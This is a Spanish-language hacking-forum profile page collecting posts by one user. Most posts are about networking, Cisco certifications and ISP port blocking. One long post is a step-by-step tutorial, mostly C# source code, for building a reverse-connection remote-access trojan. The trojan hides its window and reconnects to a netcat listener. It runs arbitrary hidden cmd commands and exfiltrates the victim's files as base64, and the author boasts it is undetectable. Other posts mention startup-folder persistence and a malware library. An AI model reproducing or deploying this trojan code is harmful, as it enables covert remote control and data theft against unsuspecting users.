Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Devilboy

#1
Off Topic / Foro de certificaciones
Marzo 05, 2016, 07:20:57 PM
Creo que estaría bien tener un área con manuales, vídeos, libros y hasta dudas sobre todo tipo de certificaciones.

Creo que no existe NADA mejor para nosotros los que nos gusta las IT que tener certificaciones
#2
Más bien un tutorial sobre cómo crear un proyecto en visual studio y nada mas
#3
Los ISP's están bloqueando los puertos. En algunos casos ya no es posible abrirlos sin pagarles mas
#4
Es un curso desactualizado
#5
Si piensas "vivir" de Linux, me refiero a trabajar usando Linux como profesión entonces no hay nada mejor que centos, usando centos puedes sacar la certificación de red hat.

O fedora si piensas seguir ese camino pero usando una distro un poco más sencilla
#6
A eso se le llama Static Routing (Enrutamiento estatico)

y eso que haces: ip route 0.0.0.0 0.0.0.0 x.x.x.x se le llama configuracion de una gateway de ultimo recurso por lo que NO es nada recomendable configurar tus routers de esa forma.

El único lugar donde es permitido configurar ese tipo de enrutamiento es en el router que está directamente conectado al isp y nada mas.

Jamas vas a ver routers conectados entre si usando tipo de enrutamiento.

otra cosa:
"Para cambiar la contraseña de un dispositivo:
         enable       
         (#) configure terminal
         (config) enable password 12345 
"

es muy vaga esa información, para cambiar la contraseña de que????

contraseña de la consola, contraseña de vty, contraseña de configuracion global???? de que tipo??

hace falta un poco mas de info
#7
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Es un gran trabajo Devilboy descargué hace tiempo una versión anterior y me quedé maravillado  me encanta la ingenuidad del Startup, me refiero el archivo que se crea en la carpeta inicio linkeando hacia el server, me quedé prendado, desconocía esa forma de hacerlo.
Por cierto.- Aprovecho para preguntarte ya que sólo lo probé con un framework 4  y en un windows 7,¿Qué frameworks son necesarios para que se ejecute el server y con qué SO's es operativo el server? gracias por tu tiempo.
Saludos compañeros.

Que bueno que te haya gustado, recuerdo que aveces lo más simple es lo que mejor funciona.

Yo lo he probado siempre con framework 4.5 en win 7,8.1 y 10 y sin ningún problema
#8
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero... y el link? jajaja

Saludos.

lo iba a poner Antrax una vez que lo subiera a la biblioteca de malware perono lo puso, ya coloqué un link
#9




Ojala les guste

salu2


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Busca libros, vídeo tutoríales, simuladores y emuladores

Busca ccna 200-120
#11
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, yo tengo ccna routing and switching y mi idea es hacer ccnp routing and switching y después hacer ccnp security o data center que son de las más demandadas

Ahh osea que el ccnp es una especie de mejora del ccna? Yo vi en CesPi, una pag de la unlp que daban cursos de los 2 que mencione arriba, vos hiciste un curso en algun lugar o son examenes libres?

Busca la pirámide de certificaciones pero en pocas palabras son 3 escalones principales.

Ccna, ccnp y ccie.

Y cada uno de estos se dividen en routing and switching, wifi, seguridad, voip, data center, isp.

Así que tú puedes escoger el camino que más te guste.

Puedes buscar alguna escuela por donde vivas o hacerle como yo estudiar en casa y solo hacer el examen
#12
Hola, yo tengo ccna routing and switching y mi idea es hacer ccnp routing and switching y después hacer ccnp security o data center que son de las más demandadas
#13
funciona muy bien, gracias
#14
C# - VB.NET / Re:Creando un troyano en C#
Noviembre 15, 2015, 10:55:06 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que excelente aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta!!!
Muchisimas gracias bro!!

Saludos!
ANTRAX

Es un tuyo que escribí hace ya tiempo man pero no sé por qué lo borraron, ojalá les guste y les sirva
#15
C# - VB.NET / Creando un troyano en C#
Noviembre 15, 2015, 10:22:13 PM
En este tuto voy a enseñar como crear el principio de un RAT de conexion inversa.

En mi caso usaré visual studio ultimate 2012 pero obviamente puede utilizar algun otro IDE.

***************Creando el Servidor*************


Crearemos un servidor muy simple que lo que hará será esperar a que el cliente se conecte esto será mediante un ciclo infinito con una pausa del tiempo que nosotros indiquémos
Abrimos vs y creamos un nuevo proyecto de winform, y dos  clases con el nombre que querámos en mi caso el nombre dle proyecto es Server, clase Servidor y Utilidades:



Primero escribiremos la clase servidor

agregamos los NameSpaces que necesitamos, en este caso solo agregarémos 3:

Código: php
using System.IO; //Streams
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos



y nuestra clase quedará de la sig. manera:

Código: php
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO; //Streams
using System.Net; //IPAdress
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos

namespace Server
{
    public class Servidor
    {
//variables necesarias para conectarnos al cliente de manera inversa, ademas de escuchar los mensajes de este

        private string ip;
        private int port;
        private TcpClient tcpClient;
        private NetworkStream ns;
        private StreamReader sr;
        private StreamWriter sw;
        private StringBuilder sb;     
       

        public Servidor(string ip, int port)
        {
            this.ip = ip;
            this.port = port;
        }

        private enum mensajes
        {
            CD,
            Mensaje
        }


        public void iniciar(int tiempo)
        {
            EjecutarServidor();
            Thread.Sleep(tiempo);           
        }

        private void EjecutarServidor()
        {
            tcpClient = new TcpClient();
            sb = new StringBuilder();

            if (!tcpClient.Connected)
            {
                try
                {
                    tcpClient.Connect(ip, port);
                    ns = tcpClient.GetStream();
                    sr = new StreamReader(ns);
                    sw = new StreamWriter(ns);

                }
                catch (Exception)
                {
                    return;
                }

                for (; ; )
                {
                    try
                    {
                        sb.Append(sr.ReadLine());
                        LeerDatos(sb.ToString());
                        sb.Remove(0, sb.Length);
                    }
                    catch (Exception)
                    {
                        limpiar();
                        break;
                    }

                }
            }//fin del if 
        }//fin del metodo EjecutarServidor

        private void LeerDatos(string datos)
        {
            string[] cadena = datos.Split('$');

            if (String.Compare(cadena[0], mensajes.Mensaje.ToString()) == 0)
            {
                Utilidades.mandarMensaje(cadena[1]);
            }
        }//fin de LeerDatos

        private void limpiar()
        {
            sr.Close();
            sw.Close();
            ns.Close();
        }//fin de limpiar
    }//fin clase servidor
}



Aquí he creado las variables que necesitamos para conectarnos al cliente, esto es la ip y el puerto (esto se hace en el constructor) ademas de un StreamReader que usarémos para escuchar los mensajes que el cliente escriba.

Usé una variable del tipo enum, esto es para validar los mensajes del cliente, esto lo hacemos de la sig forma:

si el cliente escribe por ejemplo  "MandarMensaje" el servidor compara ese mensaje con el enum y si son iguales entonces va a realizar alguna tarea que escribamos en la clase Utilidades.

En el metodo iniciar hemos creado un bucle donde se ejecutará el metodo EjecutarServidor y ademas hará una pausa de x milisegundos.

El sig. metodo es el corazón del servidor, aqui intentarémos conectarnos y escucharémos los mensajes que el cliente nos pase

Los mensajes los validaremos en el metodo LeerDatos donde mandarémos como parametros el mensaje que el cliente escriba

Aquí mediante un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta() validamos si el mensaje es igual a lo que esperámos y si es así entonces ejecutarémos lo que haya en Utilidades
además usamos un split para seprar el mensaje del cliente, mas adelante con un ejemplo mostraré lo que realmente hace

el ultimo metodo es limpiar, aqui cerrarémos los streams.

ahora en la clase Utilidades, vamos a indicarle que sea estatica para no tener que instanciarla cada vez que la querámos utilizar

aqui simplemente se ejecuta un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con el mensaje que el cliente haya escrito.

***************Usando la clase*************

ahora solo nos queda irnos al form y en el evento load de nuestro form y escribimos lo sig:

crearemos dos variables

Código: php
private Servidor servidor;
        private int tiempoRecon;


en el contructor las asignarémos:

Código: php
servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;


y el el evento load ejecutarémos nuestra clase:

Código: php
private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }



el codigo completo es el sig:

Código: php
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Server
{
    public partial class Form1 : Form
    {
        private Servidor servidor;
        private int tiempoRecon;

        public Form1()
        {
            InitializeComponent();
            servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }
    }
}


***************Usar Netcat o Cryptcat como cliente*************

Como mandar los mensajes de un cliente.

bueno es muy facil podemos crear otra aplicación pero en este caso usarémos al viejo netcat o cryptcar

lo colocámos en c:\ y abrimos linea de comandos:

Código: php
nc.exe -lvp 9999



ejecutamos nuestro servidor y verémos como estámos conectados

ahora solo escribirémos lo sig:

Mensaje$HolaDesdeElCliente

y verémos como se abre el MessageBox del servidor con el mensaje HolaDesdeElCliente

el mensaje del cliente como dije antes se valida en el metodo LeerDatos(string datos)


donde el parametro datos en este caso va a ser igual a "Mensaje$HolaDesdeElCliente"
y mediante el metodo string.split() vamos a separar en un arreglo todo el mensaje que haya antes del signo "$" y todo lo que haya despues
en este caso quedará asi:

Código: php
string[] cadena = datos.Split('$');


siendo:
cadena[0] //Mensaje
y
cadena[1] //HolaDesdeElCliente

si escribimos cualquier otra cosa verémos que nuestro servidor no hace absolutamente nada.

pero bueno ya con ese estoy seguro que se les ocurrirá muchas cosas

bueno ahora verémos como hacerlo a la inversa (del servidor al cliente)

un ejemplo extremandamente sencillo será mandar un mensaje de Bienvenida una vez que el cliente se conecte

esto lo haremos simplemnete usando el metodo writeline de nuestro StreamWriter

solamente agregruen los sig. despues de que tcpclient se conecte:

Código: php
sw.WriteLine("Hola");
sw.Flush();


con eso mandamos un mensaje mediante writeline y mediante flush borramos todos los búferes

una vez sabiendo esto es facil deducir lo que podemos hacer por ejemplo sería creando otra validacion en nuestro metodo LeerDatos

quedaría de la sig forma en pseudocdigo:

Código: php
si el mensaje del cliente es igual a "dameIP" entonces
ejecutamos el metodo Utilidades.obtenerIP

y ese resultado lo mandamos mendiante writeline


como ven es muy facil crear un troyano simple.

ahora les voy a enseñar como mandar comandos cmd a nuestro servidor


agregamos un valor a la variable enum mensajes en mi caso quedó así:

Código: php
private enum mensajes
        {
            CD,
            Mensaje,
            comando
        }



y validamos el mensaje en el metodo LeerDatos

Código: php
if (String.Compare(cadena[0], mensajes.comando.ToString()) == 0)
            {
                Utilidades.consola(cadena[1]);
            }




agregamos el sig. namespace en nuestra clase utilidades:

Código: php
using System.Diagnostics;


y creamos el sig metodo en la clase Utilidades


Código: php
public static void consola(string comando)
        {
            Process cmd = new Process();
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.RedirectStandardInput =
            true;
            cmd.StartInfo.RedirectStandardOutput =
            true;
            cmd.StartInfo.CreateNoWindow = true;
            cmd.StartInfo.UseShellExecute = false;
            cmd.Start();           

            cmd.StandardInput.WriteLine(comando);
            cmd.StandardInput.Flush();
            cmd.StandardInput.Close();
        }



y listo, ahora ejecutamos el servidor, abrimos netcat y mandamos mensaje de la siguiente forma:
comando$md pruebaaaaaa

donde comando es el mensaje que va a validar en LeerDatos
$ es simbola para separar
y md prueba es el comando (crear carpeta pruebaaaaa)

como ven es extremadamente sencillo

***************Descargar archivos del servidor*************


Seguímos usando la misma clase utilidades solo que agregarémos el metodo "downloadFile":

Código: php
 public static string downloadFile(string ruta)
        {

            FileStream fs = new FileStream(ruta, FileMode.Open);

            BinaryReader lector = new BinaryReader(fs);
            byte[] bytes = new byte[(int)fs.Length];
            string cadena = null;
           
            try
            {
                lector.Read(bytes, 0, bytes.Length);
                cadena = Convert.ToBase64String(bytes);             

            }
            catch (IOException ex)
            {
                cadena = "error";
            }

            return cadena;

        }


aquí lo que hacemos es convertir un archivo a base64

ahora agregamos una comparación a nuestra clase Server en el metodo LeerDatos:

Código: php
 if (String.Compare(cadena[0], mensajes.download.ToString()) == 0)
            {
                sw.WriteLine(Utilidades.downloadFile(cadena[1]));
               
            }


y modificamos nuestra variable enumerada "mensajes":

Código: php
  private enum mensajes
        {
            CD,
            Mensaje,
            comando,
            download
        }


por ultimo nos conectanos a nuestro server mediante netcat: -lvp 9999

y escribimos el mensaje:

Código: php
download$ruta_de_archivo


nos damos cuenta que netcat nos muestra todo el codigo en base64, solo nos queda escribir un programa para descifrar ese codigo.

Creamos un nuevo proyecto y en el form agregamos un textbox y un boton (podemos agregar mas cosas pero para hacerlo sencillo solo agregaré esos dos componentes)
y nos queda de esta forma:



hacemos doble click en el boton para agregar codigo:

Código: php
 string sImagenTemporal = "pruebaaaaa.png"; //Nombre y formato que queramos
            FileStream fs2 = new FileStream(sImagenTemporal, FileMode.Create);
            BinaryWriter bw = new BinaryWriter(fs2);


            byte[] bytes = new byte[(int)fs2.Length];     

            try
            {
                bytes = Convert.FromBase64String(textBox1.Text);
                bw.Write(bytes);
            }
             finally 
            {
               
                fs2.Close();
            }


y con eso "creamos" el archivo que hemos "descargado" del servidor

noten que aqui he hardcodeado la variable "sImagenTemporal " con un ombre de archivo y formato, esto lo he hecho así por motivos de simplicidad ya que en mi caso he descargado una imagen, pero lo que deben hacer es crear un savefiledialog pero eso ya es cosa de uds.

les dejo una idea sobre como quedaría ya con el codigo en base64:

Código: php
download$C:\Users\Devil\Desktop\DD\PC\Devil\1.png
iVBORw0KGgoAAAANSUhEUgAAA5IAAABlCAIAAACwbEt5AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAChZSURBVHhe7Z39j17Hdd/9txhFkEjUUiRF0oqg0pQoWpZM
+YVcsFBBu7KoN1t1ItVUljThAgkp2nFkNXVleEuVcpFCgVXUcSEZSwkQahcKkh8CQQiyUgKhQALECYEI
kNlCQAALUM/MuXPumTMvz9znPrv7PLvfgw8Wc889M3Nm7ty5X17eJT920003AwAAAAAAMOdMI1u//e3v
vPnmm+fPf/OWWw6YUwAAAAAAAGwEg2Xr2bPf+CjY+++//+KLf/z5z58wMQAAAAAAAMyWYbL1ySe//uGH
H3aiVZkJAwAAAAAAYLYMkK1/+If/8Ve/+lUnVGMzkQAAAAAAAMyWXrbee++xl19+5cUX/zj7xWrpPSub
CQYAAAAAAGC29LK1U6AfffRXf7V+5MinxE/UNSuZDq5z/Mxqb2eWzdl5wGf4rdOHrf+mm5bdmZCzD3vq
eBSwSRw+/S03e9XeXXrJ9IpztslTa5dO32mcjO8o2LjL7UY9B5MPAAAAgK0iI1vJ3n///YceeoT9Z89+
Q2vWDz744Pz5b3YHwaSRKneevhRpl+OnHz7cn50XWGmlOoxk06VLvXLaMg4/fEmr6uNPrV7KTSP5rbBz
svvMce2ZDQXZWr7cpZyraNkKAAAAgB2Ila1/9Ef/jQskVb///R98+9vf4UO2X/ziF8vLJyVYTBqpYfTW
vOJEGMlTq/mcCJsb2apyK0rARKRmhOxsyMvWyuWGbAUAAADAcKxspYIoV2NvvPGnt9/+SR0sxs5J1N72............... mas codigo en base64


ahora solo peguen todo lo ques les muestra netcat y peguenlo en el decripter que hicimos, click en el boton y listoooo


ya con esto hemos hecho un RAT funcional y lo mejor de todo FUD

Nota: espero no lo borren, a alguien le puede servir

Devilboy
#16
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buenas, tengo un problema que no se a que se debe ya que lo he intentado todo y no funciona nada.

Resulta que cambié de compañia de internet, y me puse a configurar el router, como ya saben y se que me lo van a decir la DMZ no es recomendable utilizarla pero la utilice para probar y descartar errores, puse mi pc como DMZ y resulta que no puedo acceder a mi pc ni siquiera a una web en el puerto 80 con un pequeño servidor apache que tengo, desde la red interna todo funciona perfectamente pero cuando me pongo a acceder desde la ip externa no me deja por ejemplo: "ip_externa/facturas/index.php", tambien probe con python en puertos como el 6565 o el 7000 pero parece ser que por algún motivo no puedo acceder desde el exterior, entonces me propuse a llamar la compañia y estube hablando con un tecnico que me reviso la conexión... me dijo que no tenia ningún puerto cerrado y que probara a reiniciar todos los dispositivos entonces reinicie router y moden pero sigue sin funcionar, también lo hice sin la DMZ con redirección de puertos externos hacia la red interna a mi pc pero tampoco, ya se me agotaron todas las ideas ¿que puedo hacer?

estámos en la misma situación, ya busque e hice todo y nada parece funcionar.

Yo creo los ISP ya están bloqueando todo por defecto, me voy a comunicar con ellos a ver que me dicen
#17
Redes y antenas / Re:Subnetting Master
Agosto 30, 2015, 08:15:39 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esta muy buena la herramienta @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, gracias por compartir hermano.

Al parecer no es compatible con IPv6, pero igual esta buena para ir aprendiendo a subnetear.

Un saludo.

Noup, no tuve tiempo de hacer la IPv6.

Pero se puede para la sig versión
#18
Redes y antenas / Subnetting Master
Agosto 27, 2015, 01:06:33 PM


Una tool que podemos usar cuando estámos aprendiendo subnetting.

La idea es usar el programa para que nos muestre una IP y podámos comparar los resultados

espero que la disfruten

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- A veces me siento a leer y responder tantas preguntas y demás en mi fan page y en otros lados donde tengo gente aprendiendo, comparto muchas historias y suelo leer gente diciendo cosas sin sentido, compartiendo tarjetas de creditos, haciendo o intentando ser estafadores... Mucha basura en internet..

Me pregunto si algún día van a volver esas personas de la vieja escuela a moldear todos nuevamente, creo que sería imposible.

Siento que se perdieron muchos valores de como era todo antes, hablo de que ya no se comparte buena información, ya no se puede conversar con la gente y establecer una charla, los chicos queriendo solamente dinero y dinero. Ya no se toman el tiempo de leer libros, pasar horas probando y testeando, viendo como todo funciona. Ahora todo es automático, nadie quiere perder tiempo.

Suele venir gente a preguntarme por donde comenzar en esto, dedíco tiempo a gente que le interesa aprender desde 0. También vienen a preguntarme como hacer Carding, hay gente para todo hoy en día... Suelo "perder tiempo" como dicen algunos enseñandolés lo poco que yo se a esas personas que quieren leerme o escucharme, tratando de que sean buenos, no que aprendan mierdas. Les doy libros, les enseño historia y me pregunto... el día que aprendan más, serán como todos los idiotas que andan haciendosé los pro?...

- Me llena de mucho orgullo que la gente me agradezca por lo que enseño, más allá que sean creditos de otras personas, hay algo que otros no hacen... es tomar esa información explicarla correctamente y hacer un debate para experimentar más cosas, sacar más ideas y hacer algo en base a esa información...


Creo que en este foro, hay gente vieja con valores como los de antes, un saludo a todos ellos. Esta es mi humilde y breve expresión de enojo y de no saber entender como es la gente hoy en día.


Uffff, recuerdo los viejos días y siento la misma nostalgia.
Además extraño ser más joven y tener tanto tiempo libre como antes para leer, leer y leer.

Qué lindos momentos pasé con los demás juackers xD
#20
Que ip y mascara estas poniendo en el otro???